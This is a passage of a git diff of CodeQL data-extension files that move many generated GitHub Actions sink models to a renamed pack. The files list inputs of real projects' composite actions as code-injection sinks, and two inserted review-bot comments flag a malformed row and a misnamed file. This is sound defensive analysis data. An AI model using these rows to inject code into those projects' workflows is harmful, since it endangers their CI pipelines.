a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index b258ea1ce2d..c222d5e1fd9 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index c0a51345ae6..0a8427f29e4 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index f362cd1f72b..52a2001db13 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 35474e6c68f..28d8cabc368 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index ce961ee6a75..f3ef4917146 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 9ad4bb30666..6150422d177 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 5fca46427e0..ad99ed2b432 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 9f0fecbe10b..5df1a5f2230 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index cadf01dbff1..b2c5857a743 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index ec4fc1da053..93996601c8a 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index e6530a19d97..c1d90d6ab0a 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index 0bae4e91cde..d29d4d5674d 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 0acb53ba1d3..0aaacca4805 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index f1b755e796b..b69a7740079 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 7d1733d647a..6ab3f7d2bf5 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 4bf33c9a343..f5ce35d96ad 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 9ca004a7c15..519adffb097 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index fc3870d89a8..69d0355d720 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 1d621562771..97a69439375 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index f09b364127e..54e557061df 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index 56e7b814231..12ed97f6af5 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 9f953b32ab1..2c64a6978af 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 257b77bc2c3..f7982d2244a 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index 49f2f86907f..9678f320425 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index 1e33c5e540a..2ee43fbcf6c 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index cfbf15549c4..2560e80f52c 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml 
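Review bot: The sink row in `pyg-team_pytorch_geometric.model.yml` names the action `pyg-team/pytorch/geometric`, which breaks the `owner_repo` file name to `owner/repo` row pattern that the other files in this directory follow; it looks as if the underscore in the repository name was turned into a slash. If these rows are matched against the `uses:` reference of a workflow step (the matching code is not in this hunk), this row would never apply and the `input.torchvision-version` code-injection sink would be missed without any error. The row should probably read `- ["pyg-team/pytorch_geometric", "*", "input.torchvision-version", "code-injection", "generated"]`. Since the file is generated, the durable fix is in the generator's handling of underscores, and other repositories with `_` in their name are worth rechecking.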
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 24730af3d77..17e4f893d39 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 6be5abd09dd..dde14bfa277 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 145b6f0d0e3..0aabf2e1d7f 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index c8b05bfd904..6fdfb2e6eba 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 04c218a76c1..b068e810823 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 5447d4b7e2e..9107fd9e85c 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index 825ce27511d..ee81ae11045 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 8f3e49c9768..a8030627789 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 1937367debc..a89b000bedf 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 01b77b7ccc6..a98ea12496f 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index edbd28d401b..8475ef34240 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index 4b31bd66c5a..fff5eaab1f4 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index a186fa070b0..5d0cef62b0b 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 92ee2971e3a..3edfa5ef14d 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index 07b8e96bfe2..d5f640e91a5 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 2a2a5baab45..32945cb21e3 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 274fab01e92..42eeca98de4 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index 3671de9e58a..5c0777ce394 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 2ef34dac8ba..ac777af0285 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index d76f20031e7..26a587e4f5c 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file 
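Review bot: `saltstack_salt.yml` is the only file in this part of the directory that does not end in `.model.yml`, and it carries the `actionsSummaryModel` row for `saltstack/salt`. If the pack's data-extension glob (not visible in this diff) selects only `*.model.yml`, the `input.version` to `output.version` taint step would not be loaded and flows through that action would be dropped silently. Consider moving the row `- ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"]` into a second `addsTo` entry in `saltstack_salt.model.yml`, as the philosowaffle and cspell files already do. It is also marked `manual` inside a `generated/` directory, so it is worth confirming that regenerating the models does not overwrite it.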
diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index eccb5dae2bd..a26ebcfa57d 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index 3cbd3330ccd..bf39b24e841 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 73c9c1f24a2..00cb4906bb5 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 90c4f699308..85f583a5e88 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index ed4e8820c99..207b5705e51 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index df51b9fe4c8..f0f3be91b4b 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", 